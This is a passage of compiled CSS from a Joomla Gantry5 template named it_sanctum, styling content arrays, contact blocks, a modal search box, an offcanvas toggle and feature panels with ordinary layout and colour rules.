  .g-content-array .g-grid {
    margin-bottom: 0;
  }
}
/* line 27, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 33, templates/it_sanctum/scss/sanctum/_contentarray.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-array .g-array-item {
    margin-bottom: 2.3445rem;
  }
}
/* line 39, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-image {
  margin: 0 0 15px 0;
}
/* line 43, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-item-title {
  margin: 0;
}
/* line 47, templates/it_sanctum/scss/sanctum/_contentarray.scss */
/* line 48, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-details, .g-content-array .g-array-item-text, .g-content-array .g-array-item-read-more {
  margin: 15px 0 0;
}
/* line 53, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-details {
  font-size: 90%;
}
/* line 56, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-details > span {
  margin-right: 10px;
}
/* line 60, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-details i {
  margin-right: 5px;
}
/* line 5, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 6, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts .g-grid {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 15, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts .g-contacts-item {
  text-align: left;
}
@media only all and (max-width: 47.938rem) {
  .g-contacts .g-contacts-item {
    margin-left: 0 !important;
    margin-right: 0 !important;
    display: block !important;
  }
  /* line 21, templates/it_sanctum/scss/sanctum/_contacts.scss */
  .g-contacts .g-contacts-item:last-child {
    margin-bottom: 0 !important;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.vertical .g-contacts-item {
  display: block;
}
/* line 31, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 32, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 33, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.horizontal .g-contacts-item:not(.g-block) {
  display: inline-block;
  margin-right: 35px;
}
/* line 36, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.horizontal .g-contacts-item:not(.g-block):last-child {
  margin-right: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 43, templates/it_sanctum/scss/sanctum/_contacts.scss */
@media only all and (max-width: 47.938rem) {
  .g-contacts.style1 .g-contacts-item {
    margin-bottom: 7px;
  }
}
/* line 48, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style1 .g-contacts-icon {
  margin-right: 5px;
}
/* line 51, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 52, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style1.vertical .g-contacts-item {
  margin-bottom: 7px;
}
/* line 54, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style1.vertical .g-contacts-item:last-child {
  margin-bottom: 0;
}
/* line 60, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 61, templates/it_sanctum/scss/sanctum/_contacts.scss */
@media only all and (max-width: 47.938rem) {
  .g-contacts.style2 .g-contacts-item {
    margin-bottom: 25px;
  }
  /* line 65, templates/it_sanctum/scss/sanctum/_contacts.scss */
  /* line 66, templates/it_sanctum/scss/sanctum/_contacts.scss */
  .g-contacts.style2 .g-contacts-item:not(.g-block) .g-contacts-icon {
    margin-top: 0 !important;
  }
}
/* line 71, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-contacts-item.g-block {
  align-self: center;
}
/* line 75, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 76, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 77, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 78, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2.horizontal .g-contacts-item:not(.g-block) .g-contacts-icon {
  margin-top: -5px;
}
/* line 84, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-contacts-icon {
  float: left;
  border: 2px solid #ddd;
  border-radius: 50%;
  font-size: 18px;
  height: 45px;
  line-height: 45px;
  text-align: center;
  width: 45px;
  color: #4f953b;
}
/* line 94, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-contacts-icon > span {
  position: relative;
  top: -1px;
}
/* line 99, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-title-value-container {
  margin-left: 60px;
}
/* line 102, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-contact-title {
  margin-top: -5px;
  margin-bottom: 0;
}
/* line 106, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 107, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2.vertical .g-contacts-item {
  margin-bottom: 25px;
}
/* line 109, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2.vertical .g-contacts-item:last-child {
  margin-bottom: 0;
}
/* line 118, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 119, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 120, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-top .g-contacts .g-contacts-item {
  display: inline-block;
  padding: 11px 15px;
  border-right: 1px solid #fff;
  margin-left: -4px;
  margin-bottom: 0;
}
/* line 126, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-top .g-contacts .g-contacts-item:first-child {
  border-left: 1px solid #fff;
  margin-left: 0;
}
/* line 130, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-top .g-contacts .g-contacts-item:last-child {
  margin-right: 0;
}
/* line 133, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-top .g-contacts .g-contacts-item > a {
  color: #959595;
}
/* line 144, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 145, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 146, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts .g-contacts-item {
  margin-left: 0 !important;
  margin-right: 0 !important;
  display: block !important;
}
/* line 150, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts .g-contacts-item:last-child {
  margin-bottom: 0 !important;
}
/* line 154, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 155, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts.style1 .g-contacts-item {
  margin-bottom: 7px;
}
/* line 159, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 160, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts.style2 .g-contacts-item {
  margin-bottom: 25px;
}
/* line 162, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 163, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts.style2 .g-contacts-item:not(.g-block) .g-contacts-icon {
  margin-top: 0 !important;
}
/* line 169, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts .g-block {
  -webkit-flex-grow: 0;
  -moz-flex-grow: 0;
  flex-grow: 0;
  -ms-flex-positive: 0;
  -webkit-flex-basis: 100%;
  -moz-flex-basis: 100%;
  flex-basis: 100%;
  -ms-flex-preferred-size: 100%;
}
/* line 177, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 178, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 179, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 180, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] #g-top .g-contacts .g-contacts-item {
  border-right: none;
  border-left: 1px solid #fff;
}
/* line 183, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] #g-top .g-contacts .g-contacts-item:first-child {
  border-right: 1px solid #fff;
}
/* line 190, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 191, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts .g-contacts-item {
  text-align: right;
}
/* line 194, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 195, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 196, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.horizontal .g-contacts-item:not(.g-block) {
  display: inline-block;
  margin-left: 35px;
  margin-right: 0;
}
/* line 200, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.horizontal .g-contacts-item:not(.g-block):last-child {
  margin-left: 0;
}
/* line 206, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 207, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.style1 .g-contacts-icon {
  margin-left: 5px;
  margin-right: 0;
}
/* line 212, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.style2 .g-contacts-icon {
  float: right;
}
/* line 216, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.style2 .g-title-value-container {
  margin-right: 60px;
  margin-left: 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog {
  text-align: left;
}
/* line 6, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 7, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search form {
  margin-bottom: 0;
}
/* line 10, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search input {
  margin-bottom: 0;
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
/* line 19, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 20, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search-form .search-field {
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
/* line 26, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search-form label {
  margin-bottom: 0;
}
/* line 29, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search-form .search-submit {
  display: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search-input {
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
/* line 42, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 43, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search {
  background: rgba(0, 0, 0, 0.7);
}
/* line 45, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 46, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search.uk-open .uk-modal-dialog {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
/* line 49, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search.uk-open .uk-close {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
/* line 53, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog {
  padding: 0;
  border-radius: 0;
  width: 455px;
  background: none;
  box-shadow: none;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
}
/* line 61, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search form {
  margin-bottom: 0;
}
/* line 65, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input {
  margin-bottom: 0;
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #fff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input::-webkit-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input::-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:-ms-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 80, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:focus {
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
}
/* line 86, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 87, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field {
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #fff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field::-webkit-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field::-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:-ms-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 101, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:focus {
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
}
/* line 105, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form label {
  margin-bottom: 0;
}
/* line 108, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-submit {
  display: none;
}
/* line 113, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input {
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #fff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input::-webkit-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input::-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:-moz-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:-ms-input-placeholder {
  color: #fff;
  opacity: 1;
}
/* line 127, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:focus {
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 1);
}
/* line 132, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-close {
  color: #fff !important;
  opacity: 1;
  font-size: 22px;
  top: 35px;
  right: 35px;
  position: absolute;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 141, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-close:hover {
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
  color: #4f953b !important;
}
/* line 149, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container .element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
/* line 158, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container i {
  opacity: 1 !important;
}
/* line 1, templates/it_sanctum/scss/sanctum/_offcanvas-toggle.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_offcanvas-toggle.scss */
.offcanvas-toggle-particle.g-offcanvas-toggle {
  display: block;
  position: relative;
  top: auto;
  left: auto;
  right: auto;
  color: inherit;
  font-size: inherit;
  line-height: inherit;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 13, templates/it_sanctum/scss/sanctum/_offcanvas-toggle.scss */
.offcanvas-toggle-particle i {
  opacity: 1 !important;
}
/* line 7, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle, .g-features2-particle {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-grid, .g-features2-particle .g-grid {
  margin-bottom: 2.3445rem;
}
/* line 12, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-grid:last-child, .g-features2-particle .g-grid:last-child {
  margin-bottom: 0;
}
/* line 14, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 15, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle .g-grid:last-child .g-features-particle-item:last-child, .g-features2-particle .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle .g-grid, .g-features2-particle .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle .g-features-particle-item, .g-features2-particle .g-features-particle-item, .g-features-particle .g-features2-particle-item, .g-features2-particle .g-features2-particle-item {
    margin-bottom: 2.3445rem;
  }
}
/* line 31, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .size-33, .g-features2-particle .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle .size-33, .g-features2-particle .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 40, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .size-16, .g-features2-particle .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle .size-16, .g-features2-particle .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 48, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-content, .g-features2-particle .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 53, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle p, .g-features2-particle p {
  margin: 0;
}
/* line 56, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-button, .g-features2-particle .g-features-particle-button, .g-features-particle .g-features-particle-subs, .g-features2-particle .g-features-particle-subs {
  margin-top: 20px;
}
/* line 62, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle {
  text-align: center;
}
/* line 64, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-title {
  margin-top: 0.75rem;
  margin-bottom: 1rem;
}
/* line 67, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-title a {
  color: #282828;
}
/* line 69, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-title a:hover {
  color: #4f953b;
}
/* line 74, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 50%;
  font-size: 2rem;
  height: 100px;
  width: 100px;
  line-height: 100px;
  text-align: center;
  vertical-align: middle;
  margin-bottom: 0.75rem;
  color: #4f953b;
  position: relative;
  display: inline-block;
  -webkit-transition: all 0.2s linear 0s;
  -moz-transition: all 0.2s linear 0s;
  transition: all 0.2s linear 0s;
}
/* line 88, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-circle-border {
  background: transparent none repeat scroll 0 0;
  border: 1px solid #ddd;
  height: 98px;
  width: 98px;
  left: 1px;
  top: 1px;
  z-index: 1;
  position: absolute;
  -webkit-transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
  -moz-transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
  transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
}
/* line 99, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-image {
  margin-bottom: 0.75rem;
  display: inline-block;
}
/* line 103, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 104, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 105, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 106, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-item .g-content:hover .g-features-particle-icon {
  color: #fff;
  background: #4f953b;
}
/* line 110, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle .g-features-particle-item .g-content:hover .g-circle-border {
  border-color: #4f953b;
  -webkit-transform: scale(1.18);
  -moz-transform: scale(1.18);
  -ms-transform: scale(1.18);
  -o-transform: scale(1.18);
  transform: scale(1.18);
  -webkit-transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
  -moz-transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
  transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
}
/* line 119, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 120, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-grid {
  margin-bottom: 1.876rem;
}
/* line 122, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-grid .g-block {
  padding: 0 0.938rem;
}
/* line 125, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-grid:last-child {
  margin-bottom: 0;
}
/* line 127, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 128, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style6 .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style6 .g-grid {
    margin-bottom: 0;
  }
}
/* line 139, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style6 .g-features-particle-item {
    margin-bottom: 1.876rem;
  }
}
/* line 144, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-content {
  padding: 3rem 2.5rem;
  background: #fff;
  border: 1px solid #ddd;
}
/* line 149, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-features-particle-icon, .g-features-particle.style6 .g-features-particle-image {
  margin-bottom: 1.25rem;
}
/* line 152, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-features-particle-title {
  margin-bottom: 1.5rem;
}
/* line 155, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-features-particle-button, .g-features-particle.style6 .g-features-particle-subs {
  margin-top: 30px;
}
/* line 158, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-subs-item {
  padding: 10px 0;
  border-bottom: 1px solid #ddd;
}
/* line 161, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style6 .g-subs-item:last-child {
  border-bottom: none;
}
/* line 166, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 167, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-grid {
  margin-bottom: 1.876rem;
}
/* line 169, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-grid .g-block {
  padding: 0 0.938rem;
}
/* line 172, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-grid:last-child {
  margin-bottom: 0;
}
/* line 174, templates/it_sanctum/scss/sanctum/_features-particle.scss */
/* line 175, templates/it_sanctum/scss/sanctum/_features-particle.scss */
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style7 .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style7 .g-grid {
    margin-bottom: 0;
  }
}
/* line 186, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-item {
  margin-top: 40px;
}
@media only all and (max-width: 47.938rem) {
  .g-features-particle.style7 .g-features-particle-item {
    margin-bottom: 1.876rem;
  }
}
/* line 192, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-content {
  padding: 25px;
  background: #fff;
  border: 1px solid #ddd;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 197, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-content:hover {
  border-color: #282828;
}
/* line 199, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-content:hover .g-features-particle-icon {
  background: #282828;
}
/* line 204, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-item-inner {
  margin-top: -64px;
}
/* line 207, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-icon, .g-features-particle.style7 .g-features-particle-image {
  margin-bottom: 1.25rem;
}
/* line 209, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-icon .g-circle-border, .g-features-particle.style7 .g-features-particle-image .g-circle-border {
  display: none;
}
/* line 213, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-icon {
  width: 75px;
  height: 75px;
  line-height: 75px;
  border-radius: 0;
  background: #4f953b;
  color: #fff;
  font-size: 24px;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 223, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-title {
  margin-bottom: 1rem;
  text-transform: uppercase;
}
/* line 227, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-features-particle-button, .g-features-particle.style7 .g-features-particle-subs {
  margin-top: 30px;
}
/* line 230, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-subs-item {
  padding: 10px 0;
  border-bottom: 1px solid #ddd;
}
/* line 233, templates/it_sanctum/scss/sanctum/_features-particle.scss */
.g-features-particle.style7 .g-subs-item:last-child {
  border-bottom: none;
}
